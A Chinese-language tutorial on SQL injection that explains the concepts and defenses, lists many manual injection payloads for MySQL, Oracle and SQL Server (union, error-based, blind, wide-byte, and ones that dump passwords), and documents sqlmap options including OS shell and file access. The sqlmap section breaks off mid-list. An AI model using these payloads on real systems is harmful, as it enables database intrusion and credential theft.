sql注入与sqlmap

一、了解sql注入

  1. sql注入

    ​ SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。

  2. 原理

    ​ SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。简单的说就是在post/getweb表单、输入域名或页面请求的查询字符串中插入SQL命令,最终使web服务器执行恶意命令的过程。

  3. 定义

    ​ SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取对数据库的信息以及提权,发生SQL注入攻击。

  4. 特点

    1. 广泛性
    2. 隐蔽性
    3. 危害大
    4. 操作方便
  5. 注入过程

    1. 第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。通常只要带有输入提交的动态网页,并且动态网页访问数据库,就可能存在SQL注入漏洞。如果程序员信息安全意识不强,采用动态构造SQL语句访问数据库,并且对用户的输入未进行有效性验证,则存在SQL注入漏洞的可能性很大。一般通过页面的报错信息来确定是否存在SQL注入漏洞。
    2. 第二步:收集后台数据库信息。不同数据库的注入方法、函数都不尽相同,因此在注入之前,我们先要判断一下数据库的类型。判断数据库类型的方法很多,可以输入特殊字符,如单引号,让程序返回错误信息,我们根据错误信息提示进行判断;还可以使用特定函数来判断,比如输入“1 and version()>0”,程序返回正常,说明version()函数被数据库识别并执行,而version()函数是MySQL特有的函数,因此可以推断后台数据库为MySQL。
    3. 第三步:猜解用户名和密码。数据库中的表和字段命名一般都是有规律的。通过构造特殊SQL语句在数据库中依次猜解出表名、字段名、字段数、用户名和密码。
    4. 第四步:查找Web后台管理入口。WEB后台管理通常不对普通用户开放,要找到后台管理的登录网址,可以利用Web目录扫描工具(如:wwwscan、AWVS)快速搜索到可能的登录地址,然后逐一尝试,便可以找到后台管理平台的登录网址。
    5. 第五步:入侵和破坏。一般后台管理具有较高权限和较多的功能,使用前面已破译的用户名、密码成功登录后台管理平台后,就可以任意进行破坏,比如上传木马、篡改网页、修改和窃取信息等,还可以进一步提权,入侵Web服务器和数据库服务器。
  6. 注入方法

    1. 数字型注入

      ​ 当输入的参数为整型时,如ID、年龄、页码等,如果存在注入漏洞,则可以认为是数字型注入。这种数字型注入最多出现在ASP、PHP等弱类型语言中,弱类型语言会自动推导变量类型,例如,参数id=8,PHP会自动推导变量id的数据类型为int类型,那么id=8 and 1=1,则会推导为string类型,这是弱类型语言的特性。而对于Java、C#这类强类型语言,如果试图把一个字符串转换为int类型,则会抛出异常,无法继续执行。所以,强类型的语言很少存在数字型注入漏洞。

    2. 字符型注入

      ​ 当输入参数为字符串时,称为字符型。数字型与字符型注入最大的区别在于:数字型不需要单引号闭合,而字符串类型一般要使用单引号来闭合。

  7. 攻击手法

    1. 基于布尔的盲注

      ​ 因为web的页面返回值都是True或者False,所以布尔盲注就是注入后根据页面返回值来得到数据库信息的一种办法。

    2. 基于时间的盲注

      ​ 当布尔型注入没有结果(页面显示正常)的时候,我们很难判断注入的代码是否被执行,也可以说到底这个注入点存不存在?这个时候布尔型注入就无法发挥自己的作用了。基于时间的盲注便应运而生,所谓基于时间的盲注,就是我们根据web页面相应的时间差来判断该页面是否存在SQL注入点。

    3. 联合查询注入

      ​ 使用联合查询进行注入的前提是我们要进行注入的页面必须有显示位。所谓联合查询注入即是使用union合并两个或多个SELECT语句的结果集,所以两个及以上的select必须有相同列、且各列的数据类型也都相同。联合查询注入可在链接最后添加order by 9基于随意数字的注入,根据页面的返回结果来判断站点中的字段数目。

    4. 基于错误信息的注入

      ​ 此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。

  8. 注入防范措施

    1. 分级管理

      ​ 对用户进行分级管理,严格控制用户的权限,对于普通用户,禁止给予数据库建立、删除、修改等相关权限,只有系统管理员才具有增、删、改、查的权限。例如上述实例中用户在查询语句中加入了drop table。肯定是不能让其执行的,否则系统的数据库安全性就无法保障。故而通过权限的设计限制。使得即使恶意攻击者在数据提交时嵌入了相关攻击代码。但因为设置了权限,从而使得代码不能执行。从而减少SQL注入对数据库的安全威胁。

    2. 参数传值

      ​ 程序员在书写SQL语言时,禁止将变量直接写入到SQL语句,必须通过设置相应的参数来传递相关的变量。从而抑制SQL注入。数据输入不能直接嵌入到查询语句中。同时要过滤输入的内容,过滤掉不安全的输入数据。或者采用参数传值的方式传递输入变量。这样可以最大程度防范SQL注入攻击。

    3. 基础过滤与二次过滤

      ​ SQL注入攻击前,入侵者通过修改参数提交“and”等特殊字符,判断是否存在漏洞,然后通过select、update等各种字符编写SQL注入语句。因此防范SQL注入要对用户输入进行检查,确保数据输入的安全性,在具体检查输入或提交的变量时,对于单引号、双引号、冒号等字符进行转换或者过滤,从而有效防止SQL注入。当然危险字符有很多,在获取用户输入提交的参数时,首先要进行基础过滤,然后根据程序的功能及用户输入的可能性进行二次过滤,以确保系统的安全性。

    4. 使用安全参数

      ​ SQL数据库为了有效抑制SQL注入攻击的影响。在进行SQLServer数据库设计时设置了专门的SQL安全参数。在程序编写时应尽量使用安全参数来杜绝注入式攻击。从而确保系统的安全性。

    5. 漏洞扫描

      ​ 为了更有效地防范SQL注入攻击,作为系统管理除了设置有效的防范措施,更应该及时发现系统存在SQL攻击安全漏洞。系统管理员可以通过采购一些专门系统的SQL漏洞扫描工具,通过专业的扫描工具,可以及时的扫描到系统存在的相应漏洞。虽然漏洞扫描工具只能扫描到SQL注入漏洞,不能防范SQL注入攻击。但系统管理员可以通过扫描到的安全漏洞,根据不同的情况采取相应的防范措施封堵相应的漏洞,从而把SQL注入攻击的门给关上,从而确保系统的安全。

    6. 多层验证

      ​ 现在的网站系统功能越来越庞大复杂。为确保系统的安全,访问者的数据输入必须经过严格的验证才能进入系统,验证没通过的输入直接被拒绝访问数据库,并且向上层系统发出错误提示信息。同时在客户端访问程序中验证访问者的相关输入信息,从而更有效的防止简单的SQL注入。但是如果多层验证中的下层如果验证数据通过,那么绕过客户端的攻击者就能够随意访问系统。因此在进行多层验证时,要每个层次相互配合,只有在客户端和系统端都进行有效的验证防护,才能更好地防范SQL注入攻击。

    7. 数据库信息加密
      1. 对称加密:即加密方和解密方都使用相同的加密算法和密钥,这种方案的密钥的保存非常关键,因为算法是公开的,而密钥是保密的,一旦密匙泄露,黑客仍然可以轻易解密。常见的对称加密算法有:AES、DES等。
      2. 非对称加密:即使用不同的密钥来进行加解密,密钥被分为公钥和私钥,用私钥加密的数据必须使用公钥来解密,同样用公钥加密的数据必须用对应的私钥来解密,常见的非对称加密算法有:RSA等。
      3. 不可逆加密:利用哈希算法使数据加密之后无法解密回原数据,这样的哈希算法常用的有:md5、SHA-1等。

二、 手工注入

0x01 Mysql 手工注入

1.1 联合注入

?id=1' order by 4--+?id=0' union select 1,2,3,database()--+?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+?id=0' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="users" --+#group_concat(column_name) 可替换为 unhex(Hex(cast(column_name+as+char)))column_name
?id=0' union select 1,2,3,group_concat(password) from users --+#group_concat 可替换为 concat_ws(',',id,users,password )
?id=0' union select 1,2,3,password from users limit 0,1--+

1.2 报错注入

1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue()select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()select * from test where id=1 and exp(~(select * from(select user())a));

每个一个报错语句都有它的原理:

exp() 报错的原理:exp 是一个数学函数,取e的x次方,当我们输入的值大于709就会报错,然后 ~ 取反它的值总会大于709,所以报错。

updatexml() 报错的原理:由于 updatexml 的第二个参数需要 Xpath 格式的字符串,以 ~ 开头的内容不是 xml 格式的语法,concat() 函数为字符串连接函数显然不符合规则,但是会将括号内的执行结果以错误的形式报出,这样就可以实现报错注入了。

爆库:?id=1' and updatexml(1,(select concat(0x7e,(schema_name),0x7e) from information_schema.schemata limit 2,1),1) -- +
爆表:?id=1' and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where table_schema='security' limit 3,1),1) -- +
爆字段:?id=1' and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where table_name=0x7573657273 limit 2,1),1) -- +
爆数据:?id=1' and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1) -- +
#concat 也可以放在外面 updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)

这里需要注意的是它加了连接字符,导致数据中的 md5 只能爆出 31 位,这里可以用分割函数分割出来:

substr(string string,num start,num length);#string为字符串,start为起始位置,length为长度
?id=1' and updatexml(1,concat(0x7e, substr((select password from users limit 1,1),1,16),0x7e),1) -- +

1.3 盲注

1.3.1 时间盲注

时间盲注也叫延时注入 一般用到函数 sleep() BENCHMARK() 还可以使用笛卡尔积(尽量不要使用,内容太多会很慢很慢) 一般时间盲注我们还需要使用条件判断函数

#if(expre1,expre2,expre3)当 expre1 为 true 时,返回 expre2,false 时,返回 expre3
#盲注的同时也配合着 mysql 提供的分割函substr、substring、left

我们一般喜欢把分割的函数编码一下,当然不编码也行,编码的好处就是可以不用引号,常用到的就有 ascii() hex() 等等

?id=1' and if(ascii(substr(database(),1,1))>115,1,sleep(5))--+?id=1' and if((substr((select user()),1,1)='r'),sleep(5),1)--+
1.3.2 布尔盲注
?id=1' and substr((select user()),1,1)='r' -- +
?id=1' and IFNULL((substr((select user()),1,1)='r'),0) -- +
#如果 IFNULL 第一个参数的表达式为 NULL,则返回第二个参数的备用值,不为 Null 则输出值
?id=1' and strcmp((substr((select user()),1,1)='r'),1) -- +
#若所有的字符串均相同,STRCMP() 返回 0,若根据当前分类次序,第一个参数小于第二个,则返回 -1,其它情况返回 1

1.4 insert,delete,update

insert,delete,update 主要是用到盲注和报错注入,此类注入点不建议使用 sqlmap 等工具,会造成大量垃圾数据,一般这种注入会出现在 注册、ip头、留言板等等需要写入数据的地方,同时这种注入不报错一般较难发现,我们可以尝试性插入、引号、双引号、转义符 \ 让语句不能正常执行,然后如果插入失败,更新失败,然后深入测试确定是否存在注入

1.4.1 报错
mysql> insert into admin (id,username,password) values (2,"or updatexml(1,concat(0x7e,(version())),0) or","admin");Query OK, 1 row affected (0.00 sec)

mysql> select * from admin;
+------+-----------------------------------------------+----------+
| id   | username                                      | password |
+------+-----------------------------------------------+----------+
|    1 | admin                                         | admin    |
|    1 | and 1=1                                       | admin    |
|    2 | or updatexml(1,concat(0x7e,(version())),0) or | admin    |
+------+-----------------------------------------------+----------+
3 rows in set (0.00 sec)

mysql> insert into admin (id,username,password) values (2,""or updatexml(1,concat(0x7e,(version())),0) or"","admin");
ERROR 1105 (HY000): XPATH syntax error: '~5.5.53'

#delete 注入很危险,很危险,很危险,切记不能使用 or 1=1 ,or 右边一定要为falsemysql> delete from admin where id =-2 or updatexml(1,concat(0x7e,(version())),0);ERROR 1105 (HY000): XPATH syntax error: '~5.5.53'

1.4.2 盲注
#int型 可以使用 运算符 比如 加减乘除 and or 异或 移位等等
mysql> insert into admin values (2+if((substr((select user()),1,1)='r'),sleep(5),1),'1',"admin");
Query OK, 1 row affected (5.00 sec)

mysql> insert into admin values (2+if((substr((select user()),1,1)='p'),sleep(5),1),'1',"admin");
Query OK, 1 row affected (0.00 sec)

#字符型注意闭合不能使用and
mysql> insert into admin values (2,''+if((substr((select user()),1,1)='p'),sleep(5),1)+'',"admin");
Query OK, 1 row affected (0.00 sec)

mysql> insert into admin values (2,''+if((substr((select user()),1,1)='r'),sleep(5),1)+'',"admin");
Query OK, 1 row affected (5.01 sec)

# delete 函数 or 右边一定要为 false
mysql> delete from admin where id =-2 or if((substr((select user()),1,1)='r4'),sleep(5),0);
Query OK, 0 rows affected (0.00 sec)

mysql> delete from admin where id =-2 or if((substr((select user()),1,1)='r'),sleep(5),0);
Query OK, 0 rows affected (5.00 sec)

#update 更新数据内容
mysql> select * from admin;
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
|    2 | 1        | admin    |
|    2 | 1        | admin    |
|    2 | 1        | admin    |
|    2 | admin    | admin    |
+------+----------+----------+
4 rows in set (0.00 sec)

mysql> update admin set id="5"+sleep(5)+"" where id=2;
Query OK, 4 rows affected (20.00 sec)
Rows matched: 4  Changed: 4  Warnings: 0

1.5 二次注入与宽字节注入

二次注入的语句:在没有被单引号包裹的sql语句下,我们可以用16进制编码他,这样就不会带有单引号等。

mysql> insert into admin (id,name,pass) values ('3',0x61646d696e272d2d2b,'11');
Query OK, 1 row affected (0.00 sec)

mysql> select * from admin;
+----+-----------+-------+
| id | name      | pass  |
+----+-----------+-------+
|  1 | admin     | admin |
|  2 | admin'111 | 11111 |
|  3 | admin'--+ | 11    |
+----+-----------+-------+
4 rows in set (0.00 sec)

二次注入在没有源码的情况比较难发现,通常见于注册,登录恶意账户后,数据库可能会因为恶意账户名的问题,将 admin'--+ 误认为 admin 账户

宽字节注入:针对目标做了一定的防护,单引号转变为 \' , mysql 会将 \ 编码为 %5c ,宽字节中两个字节代表一个汉字,所以把 %df 加上 %5c 就变成了一个汉字“運”,使用这种方法成功绕过转义,就是所谓的宽字节注入

id=-1%df' union select...
#没使用宽字节%27 -> %5C%27
#使用宽字节%df%27 -> %df%5c%27 -> 運'

0x02 Oracle 手工注入

2.1 联合注入

?id=-1' union select user,null from dual--
?id=-1' union select version,null from v$instance--
?id=-1' union select table_name,null from (select * from (select rownum as limit,table_name from user_tables) where limit=3)--
?id=-1' union select column_name,null from (select * from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=2)--
?id=-1' union select username,passwd from users--
?id=-1' union select username,passwd from (select * from (select username,passwd,rownum as limit from users) where limit=3)--

2.2 报错注入

?id=1' and 1=ctxsys.drithsx.sn(1,(select user from dual))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select banner from v$version where banner like 'Oracle%))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select table_name from (select rownum as limit,table_name from user_tables) where limit= 3))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select column_name from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=3))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select passwd from (select passwd,rownum as limit from users) where limit=1))--

2.3 盲注

2.3.1 布尔盲注

既然是盲注,那么肯定涉及到条件判断语句,Oracle除了使用IF the else end if这种复杂的,还可以使用 decode() 函数。
语法:decode(条件,值1,返回值1,值2,返回值2,...值n,返回值n,缺省值);

该函数的含义如下:

IF 条件=值1 THEN
		RETURN(返回值1)
ELSIF 条件=值2 THEN
		RETURN(返回值2)    
		......
ELSIF 条件=值n THEN
		RETURN(返回值n)
ELSE   
    RETURN(缺省值)
END IF
?id=1' and 1=(select decode(user,'SYSTEM',1,0,0) from dual)--
?id=1' and 1=(select decode(substr(user,1,1),'S',1,0,0) from dual)--
?id=1' and ascii(substr(user,1,1))> 64--  #二分法
2.3.2 时间盲注

可使用DBMS_PIPE.RECEIVE_MESSAGE('任意值',延迟时间)函数进行时间盲注,这个函数可以指定延迟的时间

?id=1' and 1=(case when ascii(substr(user,1,1))> 128 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--
?id=1' and 1=(case when ascii(substr(user,1,1))> 64 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--

0x03 SQL server 手工注入

3.1 联合注入

?id=-1' union select null,null--
?id=-1' union select @@servername, @@version--
?id=-1' union select db_name(),suser_sname()--
?id=-1' union select (select top 1 name from sys.databases where name not in (select top 6 name from sys.databases)),null--
?id=-1' union select (select top 1 name from sys.databases where name not in (select top 7 name from sys.databasesl),null--
?id--1' union select (select top 1 table_ name from information_schema.tables where table_name not in (select top 0 table_name from information_schema.tables)),null--
?id=-1' union select (select top 1 column name from information_schema.columns where table_name='users' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'users')),null---
?id=-1' union select (select top 1 username from users where username not in (select top 3 username from users)),null--

3.2 报错注入

?id=1' and 1=(select 1/@@servername)--
?id=1' and 1=(select 1/(select top 1 name from sys.databases where name not in (select top 1 name from sys.databases))--

3.3 盲注

3.3.1 布尔盲注
?id=1' and ascii(substring((select db_ name(1)),1,1))> 64--

3.3.2 时间盲注

?id= 1';if(2>1) waitfor delay '0:0:5'--
?id= 1';if(ASCII(SUBSTRING((select db_name(1)),1,1))> 64) waitfor delay '0:0:2'--

三、了解sqlmap

  1. sqlmap

    ​ sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,日前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。sqlmap的功能强大到让你惊叹,常规注入工具不能绕过的话,终极使用sqlmap会有意想不到的效果。

  2. Sqlmap是什么

    1. 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。
    2. 完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。
    3. 在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。
    4. 支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列。
    5. 支持自动识别密码哈希格式并通过字典破解密码哈希。
    6. 支持完全地下载某个数据库中的某个表,也可以只下载某个表中的某几列,甚至只下载某一列中的部分数据,这完全取决于用户的选择。
    7. 支持在数据库管理系统中搜索指定的数据库名、表名或列名
    8. 当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持下载或上传文件。
    9. 当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持执行任意命令并回现标准输出。
  3. 下载安装sqlmap

    1. linux下git直接安装

      gitclone –depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

    2. windows下安装

      windows下下载sqlmap的压缩包,解压后即可使用。但需要一些组件包的支持,需要有python2.7.x或者2.6.x环境支持。

    3. kali及PentestBox默认安装sqlmap

      image-20200401131519983

  4. sqlmap参数

    1. 选项
      1. -h,–help 显示基本帮助信息并退出

        -hh 显示高级帮助信息并退出

        –version 显示程序版本信息并退出

        -v VERBOSE信息级别: 0-6 (缺省1),其值具体含义:“0”只显示python错误以及严重的信息;1同时显示基本信息和警告信息(默认);“2”同时显示debug信息;“3”同时显示注入的payload;“4”同时显示HTTP请求;“5”同时显示HTTP响应头;“6”同时显示HTTP响应页面;如果想看到sqlmap发送的测试payload最好的等级就是3。

    2. 目标
      1. -d DIRECT 直接连接数据库的连接字符串

        -u URL, –url=URL 目标URL (e.g.”http://www.site.com/vuln.php?id=1“),使用-u或者–url

        -l LOGFILE 从Burp或者WebScarab代理日志文件中分析目标

        -x SITEMAPURL 从远程网站地图(sitemap.xml)文件来解析目标

        -m BULKFILE 将目标地址保存在文件中,一行为一个URL地址进行批量检测。

        -r REQUESTFILE 从文件加载HTTP请求,sqlmap可以从一个文本文件中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等),请求是HTTPS的时需要配合这个–force-ssl参数来使用,或者可以在Host头后门加上:443

        -g GOOGLEDORK 从谷歌中加载结果目标URL(只获取前100个结果,需要挂代理)

        -c CONFIGFILE 从配置ini文件中加载选项

    3. 请求
      1. 这些选项可以用来指定如何连接到目标URL

        –method=METHOD 强制使用给定的HTTP方法(例如put)

            --data=DATA   通过POST发送数据参数,sqlmap会像检测GET参数一样检测POST的参数。--data="id=1" -f --banner --dbs --users
        

        –param-del=PARA.. 当GET或POST的数据需要用其他字符分割测试参数的时候需要用到此参数。

        –cookie=COOKIE HTTP Cookieheader 值

        –cookie-del=COO.. 用来分隔cookie的字符串值

        –load-cookies=L.. Filecontaining cookies in Netscape/wget format

        –drop-set-cookie IgnoreSet-Cookie header from response

        –user-agent=AGENT 默认情况下sqlmap的HTTP请求头中User-Agent值是:sqlmap/1.0-dev-xxxxxxx(http://sqlmap.org)可以使用–user-agent参数来修改,同时也可以使用–random-agent参数来随机的从./txt/user-agents.txt中获取。当–level参数设定为3或者3以上的时候,会尝试对User-Angent进行注入

        –random-agent 使用random-agent作为HTTP User-Agent头值

        –host=HOST HTTP Hostheader value

        –referer=REFERER sqlmap可以在请求中伪造HTTP中的referer,当–level参数设定为3或者3以上的时候会尝试对referer注入

        -H HEADER, –hea.. 额外的http头(e.g.”X-Forwarded-For: 127.0.0.1″)

        –headers=HEADERS 可以通过–headers参数来增加额外的http头(e.g.”Accept-Language: fr\nETag: 123″)

        –auth-type=AUTH.. HTTP的认证类型 (Basic, Digest, NTLM or PKI)

        –auth-cred=AUTH.. HTTP 认证凭证(name:password)

        –auth-file=AUTH.. HTTP 认证PEM证书/私钥文件;当Web服务器需要客户端证书进行身份验证时,需要提供两个文件:key_file,cert_file,key_file是格式为PEM文件,包含着你的私钥,cert_file是格式为PEM的连接文件。

        –ignore-401 Ignore HTTPError 401 (Unauthorized)忽略HTTP 401错误(未授权的)

        –ignore-proxy 忽略系统的默认代理设置

        –ignore-redirects忽略重定向的尝试

        –ignore-timeouts 忽略连接超时

        –proxy=PROXY 使用代理服务器连接到目标URL

        –proxy-cred=PRO.. 代理认证凭证(name:password)

        –proxy-file=PRO.. 从文件加载代理列表

        –tor 使用Tor匿名网络

        –tor-port=TORPORT 设置Tor代理端口

        –tor-type=TORTYPE 设置Tor代理类型 (HTTP,SOCKS4 or SOCKS5 (缺省))

        –check-tor 检查Tor的是否正确使用

        –delay=DELAY 可以设定两个HTTP(S)请求间的延迟,设定为0.5的时候是半秒,默认是没有延迟的。

        –timeout=TIMEOUT 可以设定一个HTTP(S)请求超过多久判定为超时,10表示10秒,默认是30秒。

        –retries=RETRIES 当HTTP(S)超时时,可以设定重新尝试连接次数,默认是3次。

        –randomize=RPARAM可以设定某一个参数值在每一次请求中随机的变化,长度和类型会与提供的初始值一样

        –safe-url=SAFEURL 提供一个安全不错误的连接,每隔一段时间都会去访问一下

        –safe-post=SAFE.. 提供一个安全不错误的连接,每次测试请求之后都会再访问一遍安全连接。

        –safe-req=SAFER.. 从文件中加载安全HTTP请求

        –safe-freq=SAFE.. 测试一个给定安全网址的两个访问请求

        –skip-urlencode 跳过URL的有效载荷数据编码

        –csrf-token=CSR.. Parameter usedto hold anti-CSRF token参数用来保存反CSRF令牌

        –csrf-url=CSRFURL URL地址访问提取anti-CSRF令牌

        –force-ssl 强制使用SSL/HTTPS

        –hpp 使用HTTP参数污染的方法

        –eval=EVALCODE 在有些时候,需要根据某个参数的变化,而修改另个一参数,才能形成正常的请求,这时可以用–eval参数在每次请求时根据所写python代码做完修改后请求。(e.g “import hashlib;id2=hashlib.md5(id).hexdigest()”)

        sqlmap -u”http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b“–eval=”import hashlib;hash=hashlib.md5(id).hexdigest()”

    4. 优化
      1. -o 打开所有的优化开关

        –predict-output 预测普通查询输出

        –keep-alive 使用持久HTTP(S)连接

        –null-connection 获取页面长度

        –threads=THREADS 当前http(s)最大请求数 (默认 1)

    5. 注入
      1. -p TESTPARAMETER 可测试的参数

        –skip=SKIP 跳过对给定参数的测试

        –skip-static 跳过测试不显示为动态的参数

        –param-exclude=.. 使用正则表达式排除参数进行测试(e.g. “ses”)

        –dbms=DBMS 强制后端的DBMS为此值

        –dbms-cred=DBMS.. DBMS认证凭证(user:password)

        –os=OS 强制后端的DBMS操作系统为这个值

        –invalid-bignum 使用大数字使值无效

        –invalid-logical 使用逻辑操作使值无效

        –invalid-string 使用随机字符串使值无效

        –no-cast 关闭有效载荷铸造机制

        –no-escape 关闭字符串逃逸机制

        –prefix=PREFIX 注入payload字符串前缀

        –suffix=SUFFIX 注入payload字符串后缀

        –tamper=TAMPER 使用给定的脚本篡改注入数据

    6. 检测
      1. –level=LEVEL 执行测试的等级(1-5,默认为1)

        –risk=RISK 执行测试的风险(0-3,默认为1)

        –string=STRING 查询时有效时在页面匹配字符串

        –not-string=NOT.. 当查询求值为无效时匹配的字符串

        –regexp=REGEXP 查询时有效时在页面匹配正则表达式

        –code=CODE 当查询求值为True时匹配的HTTP代码

        –text-only 仅基于在文本内容比较网页

        –titles 仅根据他们的标题进行比较

    7. 技巧
      1. –technique=TECH SQL注入技术测试(默认BEUST)

        –time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)

        –union-cols=UCOLS 定列范围用于测试UNION查询注入

        –union-char=UCHAR 暴力猜测列的字符数

        –union-from=UFROM SQL注入UNION查询使用的格式

        –dns-domain=DNS.. DNS泄露攻击使用的域名

        –second-order=S.. URL搜索产生的结果页面

    8. 指纹
      1. -f, –fingerprint 执行广泛的DBMS版本指纹检查
    9. 枚举
      1. -a, –all 获取所有信息

        -b, –banner 获取数据库管理系统的标识

        –current-user 获取数据库管理系统当前用户

        –current-db 获取数据库管理系统当前数据库

        –hostname 获取数据库服务器的主机名称

        –is-dba 检测DBMS当前用户是否DBA

        –users 枚举数据库管理系统用户

        –passwords 枚举数据库管理系统用户密码哈希

        –privileges 枚举数据库管理系统用户的权限

        –roles 枚举数据库管理系统用户的角色

        –dbs 枚举数据库管理系统数据库

        –tables 枚举的DBMS数据库中的表

        –columns 枚举DBMS数据库表列

        –schema 枚举数据库架构

        –count 检索表的项目数,有时候用户只想获取表中的数据个数而不是具体的内容,那么就可以使用这个参数:sqlmap -u url –count -D testdb

        –dump 转储数据库表项

        –dump-all 转储数据库所有表项

        –search 搜索列(S),表(S)和/或数据库名称(S)

        –comments 获取DBMS注释

        -D DB 要进行枚举的指定数据库名

        -T TBL DBMS数据库表枚举

        -C COL DBMS数据库表列枚举

        -X EXCLUDECOL DBMS数据库表不进行枚举

        -U USER 用来进行枚举的数据库用户

        –exclude-sysdbs 枚举表时排除系统数据库

        –pivot-column=P.. Pivot columnname

        –where=DUMPWHERE Use WHEREcondition while table dumping

        –start=LIMITSTART 获取第一个查询输出数据位置

        –stop=LIMITSTOP 获取最后查询的输出数据

        –first=FIRSTCHAR 第一个查询输出字的字符获取

        –last=LASTCHAR 最后查询的输出字字符获取

        –sql-query=QUERY 要执行的SQL语句

        –sql-shell 提示交互式SQL的shell

        –sql-file=SQLFILE 要执行的SQL文件

    10. 暴力
      1. –common-tables 检查存在共同表

        –common-columns 检查存在共同列

    11. 自定义函数注入
      1. –udf-inject 注入用户自定义函数

        –shared-lib=SHLIB 共享库的本地路径

    12. 访问文件系统
      1. –file-read=RFILE 从后端的数据库管理系统文件系统读取文件,SQL Server2005中读取二进制文件example.exe:

        sqlmap -u”http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther“–file-read “C:/example.exe” -v 1

        –file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件

        –file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

    13. 操作系统访问
      1. –os-cmd=OSCMD 执行操作系统命令(OSCMD)

        –os-shell 交互式的操作系统的shell

        –os-pwn 获取一个OOB shell,meterpreter或VNC

        –os-smbrelay 一键获取一个OOBshell,meterpreter或VNC

        –os-bof 存储过程缓冲区溢出利用

        –priv-esc 数据库进程用户权限提升

        –msf-path=MSFPATH MetasploitFramework本地的安装路径

        –tmp-path=TMPPATH 远程临时文件目录的绝对路径

      2. linux查看当前用户命令:

        sqlmap -u”http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1” –os-cmd id -v1

    14. Windows注册表访问
      1. –reg-read 读一个Windows注册表项值

        –reg-add 写一个Windows注册表项值数据

        –reg-del 删除Windows注册表键值

        –reg-key=REGKEY Windows注册表键

        –reg-value=REGVAL Windows注册表项值

        –reg-data=REGDATA Windows注册表键值数据

        –reg-type=REGTYPE Windows注册表项值类型

    15. 注入技术
      1. 测试是否是注入

        参数:--technique

        这个参数可以指定sqlmap使用的探测技术,默认情况下会测试所有的方式。

        支持的探测方式如下:

        B: Boolean-based blind SQL injection(布尔型注入)
        E: Error-based SQL injection(报错型注入)
        U: UNION query SQL injection(可联合查询注入)
        S: Stacked queries SQL injection(可多语句查询注入)
        T: Time-based blind SQL injection(基于时间延迟注入)
        
        设定延迟注入的时间

        参数:--time-sec

        当使用基于时间的盲注时,时刻使用--time-sec参数设定延时时间,默认是5秒。

        设定UNION查询字段数

        参数:--union-cols

